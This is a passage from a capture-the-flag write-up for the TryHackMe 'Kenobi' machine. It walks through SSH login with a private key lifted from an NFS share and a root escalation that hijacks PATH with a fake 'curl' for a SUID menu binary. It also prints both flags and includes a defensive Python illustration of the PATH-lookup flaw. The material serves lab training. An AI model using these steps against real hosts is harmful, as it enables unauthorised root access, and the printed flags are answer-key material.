drwxr-xr-x 14 root root 4096 Sep 4 2019 .
drwxr-xr-x 3 root root 4096 Apr 10 16:25 ..
drwxr-xr-x 2 root root 4096 Sep 4 2019 backups
drwxr-xr-x 9 root root 4096 Sep 4 2019 cache
drwxrwxrwt 2 root root 4096 Sep 4 2019 crash
drwxr-xr-x 40 root root 4096 Sep 4 2019 lib
drwxrwsr-x 2 root staff 4096 Apr 12 2016 local
lrwxrwxrwx 1 root root 9 Sep 4 2019 lock -> /run/lock
drwxrwxr-x 10 root crontab 4096 Sep 4 2019 log
drwxrwsr-x 2 root mail 4096 Feb 27 2019 mail
drwxr-xr-x 2 root root 4096 Feb 27 2019 opt
lrwxrwxrwx 1 root root 4 Sep 4 2019 run -> /run
drwxr-xr-x 2 root root 4096 Jan 30 2019 snap
drwxr-xr-x 5 root root 4096 Sep 4 2019 spool
drwxrwxrwt 6 root root 4096 Apr 10 16:21 tmp
drwxr-xr-x 3 root root 4096 Sep 4 2019 www
The copied key is now visible under tmp/ on the mount (the /var/tmp/id_rsa we created through mod_copy). We copy it into the working directory and check its contents:
┌──(kali㉿kali)-[~]
└─$ sudo cp /mnt/kenobiNFS/tmp/id_rsa .
┌──(kali㉿kali)-[~]
└─$ cat /mnt/kenobiNFS/tmp/id_rsa
-----BEGIN RSA PRIVATE KEY-----
[key material omitted]
-----END RSA PRIVATE KEY-----
┌──(root💀kali)-[/home/kali]
└─# nano id_rsa
(the key is opened only to verify that it is complete; the contents are the same as above)
┌──(root💀kali)-[/home/kali]
└─# ls
1.c diccionario grafana_exploit.py log.txt plugin.php routersploit usuarios
alectodb-passwords.txt Docker headers MKBRUTUS plugins.txt rtl8188eu Videos
alectodb-usernames.txt Documents herramientas morata.txt plugin.zip scripts volatility3
beef Downloads hola.zip Music prueba.txt script.sh WinboxExploit
bypassamsi Empire ibombshell Oralyzer Public sqlmap.txt Windows-Exploit
capturas exploits id_rsa ParamSpider reports Suggester
contras flask kenobi.txt password.txt reverseshell.php Templates
Desktop GOD-KILLER kerbrute Pictures reverse.zip.2 TheFatRat
SSH refuses to use a private key that is readable by other users, so we restrict its permissions first:
┌──(root💀kali)-[/home/kali]
└─# chmod 600 id_rsa
Then we authenticate to the target as 'kenobi' with the retrieved key. No password is asked because the key was generated without a passphrase (as log.txt told us):
┌──(root💀kali)-[/home/kali]
└─# ssh -i id_rsa kenobi@10.10.81.7
The authenticity of host '10.10.81.7 (10.10.81.7)' can't be established.
ED25519 key fingerprint is SHA256:GXu1mgqL0Wk2ZHPmEUVIS0hvusx4hk33iTcwNKPktFw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.81.7' (ED25519) to the list of known hosts.
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
103 packages can be updated.
65 updates are security updates.
Last login: Wed Sep 4 07:10:15 2019 from 192.168.1.147
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
kenobi@kenobi:~$
To finish the machine we need the two flags, the user flag and the root flag, which on TryHackMe boxes are normally at:
- /home/<user>/user.txt
- /root/root.txt
The user flag is sitting in kenobi's home directory:
kenobi@kenobi:~$ ls
share user.txt
kenobi@kenobi:~$ cat user.txt
d0b0f3f53b6caa532a83915e19224899
Now we escalate privileges. We list SUID binaries (files with the setuid bit run with their owner's privileges, here root). Almost all entries are standard Ubuntu binaries; /usr/bin/menu is not, which makes it the candidate to examine.
kenobi@kenobi:~$ find / -perm -4000 2>/dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6
kenobi@kenobi:~$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
HTTP/1.1 200 OK
Date: Thu, 10 Apr 2025 14:55:48 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Wed, 04 Sep 2019 09:07:20 GMT
ETag: "c8-591b6884b6ed2"
Accept-Ranges: bytes
Content-Length: 200
Vary: Accept-Encoding
Content-Type: text/html
Option 1 prints the response headers of an HTTP HEAD request against the local web server, which is what `curl -I` produces, and the binary is SUID root. If it runs curl by bare name, the lookup walks our PATH, so a file named curl placed earlier in PATH gets executed instead, with root privileges. The steps:
- echo /bin/bash > curl (create a file named curl in the current directory whose only content is /bin/bash; when executed as a script it starts a bash shell)
- chmod 777 curl (make the file executable; chmod +x would be enough, 777 is just what was used here)
- export PATH=.:$PATH (prepend the current directory to PATH, so when menu looks up curl it finds ./curl before the real /usr/bin/curl)
- echo $PATH (verify the change)
kenobi@kenobi:~$ echo /bin/bash > curl
kenobi@kenobi:~$ chmod 777 curl
kenobi@kenobi:~$ export PATH=.:$PATH
kenobi@kenobi:~$ echo $PATH
.:/home/kenobi/bin:/home/kenobi/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
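What the steps above rely on is the PATH search that a shell (or execvp) performs for an unqualified command name. The Python below is an added example, not code from the writeup; the menu binary's source is not shown on the page, so the "bare curl in a shell string" pattern in vulnerable_status_check is an assumption about how it behaves. The example plants a fake curl in a temporary directory, prepends that directory to PATH (the same as the writeup's export PATH=.:$PATH, with the directory spelled out), runs the vulnerable pattern, and shows the hardened form: resolve against a fixed trusted PATH and exec an argv list with a scrubbed environment. The fake curl only echoes a marker instead of spawning a shell.

```python
"""Added example (not part of the writeup): the PATH lookup the hijack depends on,
reproduced in Python. menu's source is not on the page, so the "bare curl in a
shell string" pattern is an assumption about it; the fake curl only echoes a
marker instead of spawning a shell."""
import os
import shutil
import subprocess
import tempfile

TRUSTED_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"   # what a fixed SUID program should use


def resolve(command: str, path: str):
    """Reproduce the execvp()/sh lookup: first executable regular file, in PATH order.
    An empty entry ("" as in 'PATH=:/usr/bin') means the current directory, like '.'."""
    for entry in path.split(":"):
        candidate = os.path.join(entry or ".", command)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def vulnerable_status_check(env: dict) -> str:
    """The pattern we assume menu uses: a shell string with an unqualified 'curl'.
    Whatever PATH the caller supplies decides which 'curl' runs."""
    return subprocess.run("curl -I localhost", shell=True, env=env,
                          capture_output=True, text=True).stdout


def hardened_command():
    """Fixed form: resolve against a fixed trusted PATH, refuse to guess, and
    return an argv list to exec directly (no shell; the caller passes a scrubbed
    environment such as {"PATH": TRUSTED_PATH} rather than the user's)."""
    exe = resolve("curl", TRUSTED_PATH)
    return None if exe is None else [exe, "-I", "localhost"]


def hijack_demo():
    """Plant <tmpdir>/curl, prepend tmpdir to PATH and run the vulnerable call.
    Returns the path the lookup picked and the output the call produced."""
    work = tempfile.mkdtemp(prefix="pathhijack-")
    try:
        fake = os.path.join(work, "curl")
        with open(fake, "w") as fh:
            # stand-in for the writeup's "/bin/bash" payload
            fh.write("#!/bin/sh\necho HIJACKED as uid $(id -u)\n")
        os.chmod(fake, 0o755)
        attacker_env = {"PATH": work + ":" + os.environ.get("PATH", TRUSTED_PATH)}
        picked = resolve("curl", attacker_env["PATH"])
        output = vulnerable_status_check(attacker_env)
        return picked, output
    finally:
        shutil.rmtree(work, ignore_errors=True)


if __name__ == "__main__":
    picked, out = hijack_demo()
    print("lookup chose:", picked)
    print("vulnerable call printed:", out.strip())
    print("hardened argv:", hardened_command())
```

The defensive rule this illustrates: a setuid program must never let the caller's environment decide which binaries it runs. Absolute paths, an argv list instead of a shell string, and a reset PATH (or dropping privileges before the call) each close the hole on their own; all three together is the usual recommendation.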
If everything is in place, running menu and choosing option 1 now executes our curl, i.e. /bin/bash, with root privileges. The "To run a command as administrator" lines are Ubuntu's standard greeting for an interactive root bash, and the prompt changes to root@kenobi:
kenobi@kenobi:~$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
root@kenobi:~# whoami
root
root@kenobi:~# ls
curl share user.txt
root@kenobi:~# cd ..
root@kenobi:/home# ls
kenobi
root@kenobi:/home# cd ..
root@kenobi:/# ls
bin etc initrd.img.old lost+found opt run srv usr vmlinuz.old
boot home lib media proc sbin sys var
dev initrd.img lib64 mnt root snap tmp vmlinuz
root@kenobi:/# find /root/root.txt
/root/root.txt
Reading /root/root.txt gives the root flag:
root@kenobi:/# cat /root/root.txt
177b3cd8562289f37382721c28381f02
Thank you very much for reading this article.
I hope you liked it and learned something new.
This article has been written for ethical purposes.
Good Hack